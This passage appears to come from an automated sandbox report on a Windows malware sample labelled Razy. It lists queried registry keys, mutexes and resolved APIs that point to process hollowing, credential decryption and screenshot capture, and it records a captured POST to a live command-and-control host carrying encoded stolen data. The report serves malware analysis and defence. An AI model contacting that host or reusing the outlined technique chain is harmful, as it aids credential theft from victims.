HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
A984gyusiggffvvgv

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
crypt32.dll.CryptUnprotectData
crtdll.dll.wcscmp
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdiplusShutdown
gdiplus.dll.GdipCreateBitmapFromHBITMAP
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipSaveImageToStream
ole32.dll.CreateStreamOnHGlobal
ole32.dll.GetHGlobalFromStream
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.GetComputerNameW
kernel32.dll.GlobalMemoryStatus
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.GetFileAttributesW
kernel32.dll.CreateMutexA
kernel32.dll.GetLastError
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.SetEnvironmentVariableW
kernel32.dll.SetCurrentDirectoryW
kernel32.dll.FindFirstFileW
kernel32.dll.FindNextFileW
kernel32.dll.LocalFree
kernel32.dll.GetTickCount
kernel32.dll.CopyFileW
kernel32.dll.FindClose
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Process32FirstW
kernel32.dll.Process32NextW
kernel32.dll.GetModuleFileNameW
kernel32.dll.SetDllDirectoryW
kernel32.dll.GetLocaleInfoA
kernel32.dll.GetLocalTime
kernel32.dll.GetTimeZoneInformation
kernel32.dll.RemoveDirectoryW
kernel32.dll.DeleteFileW
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.GetDriveTypeA
advapi32.dll.GetUserNameW
advapi32.dll.RegCreateKeyExW
advapi32.dll.LookupAccountSidA
advapi32.dll.CreateProcessAsUserW
advapi32.dll.CheckTokenMembership
advapi32.dll.RegOpenKeyW
advapi32.dll.RegEnumKeyW
user32.dll.EnumDisplayDevicesW
user32.dll.wvsprintfA
user32.dll.GetKeyboardLayoutList
shell32.dll.ShellExecuteW
sechost.dll.LookupAccountSidLocalA
wsock32.dll.WSAStartup
wsock32.dll.gethostbyname
wsock32.dll.socket
wsock32.dll.send
wsock32.dll.recv
wsock32.dll.htons
wsock32.dll.connect
wsock32.dll.closesocket

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\run1.exe"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-05-21 16:49:16 2018-05-21 16:52:08 172

1 HTTP Request(s) detected

http://hhamay.website/v31/index.php
  • Hostname: hhamay.website
  • IP Address: 198.54.126.109
  • Port: 80
  • Count: 1

POST /v31/index.php HTTP/1.0
Host: hhamay.website
Connection: close
Content-Length: 96
Accept-Language: en-US
Content-Type: application/octet-stream

\x99LB\x9dOQ\xc3\x0c\x05\xc8\x0c\x05\xce\x0c\x05\xc8m\x13\xcd\x19s\xbd\x0c\x04\xba\x0c\x05\xc9\x0c\x05\xc9\x0c\x05\xccm\x13\xcd\x1f\x13\xcd\x1e\x13\xcd\x10t\xdb\x1br\xbch\x13\xcd\x1cr\xb8\x0c\x05\xc6h\x13\xcd\x19\x13\xccm\x13\xcd\x11\x13\xcd\x10r\xbfhu\xba\x0c\x05\xc6\x0c\x04\xbam\x13\xcd\x1a\x13\xcd\x1cp\xb8\x0c\x05\xc8hu

#infosec #automation

TheSystem Itself @ 2018-05-21 16:51:22

Detected family: #Razy

TheSystem Itself @ 2018-05-21 17:06:02